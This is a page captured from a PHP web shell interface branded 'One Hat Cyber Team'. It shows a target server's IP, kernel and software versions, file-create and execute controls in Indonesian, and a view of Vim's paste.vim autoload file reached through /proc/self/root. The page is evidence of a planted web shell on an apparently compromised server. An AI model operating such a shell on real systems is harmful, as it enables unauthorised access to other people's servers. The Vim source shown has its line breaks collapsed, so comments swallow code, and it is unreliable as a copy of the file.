⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
proc
/
self
/
root
/
usr
/
share
/
vim
/
vim91
/
autoload
/
View File Name :
paste.vim
" Vim support file to help with paste mappings and menus " Maintainer: The Vim Project
" Last Change: 2023 Aug 10 " Former Maintainer: Bram Moolenaar
" Define the string to use for items that are present both in Edit, Popup and " Toolbar menu. Also used in mswin.vim and macmap.vim. let paste#paste_cmd = {'n': ":call paste#Paste()
"} let paste#paste_cmd['v'] = '"-c
' . paste#paste_cmd['n'] let paste#paste_cmd['i'] = "\
\
\"+gP" func! paste#Paste() let ove = &ve set ve=all normal! `^ if @+ != '' normal! "+gP endif let c = col(".") normal! i if col(".") < c " compensate for i
moving the cursor left normal! l endif let &ve = ove endfunc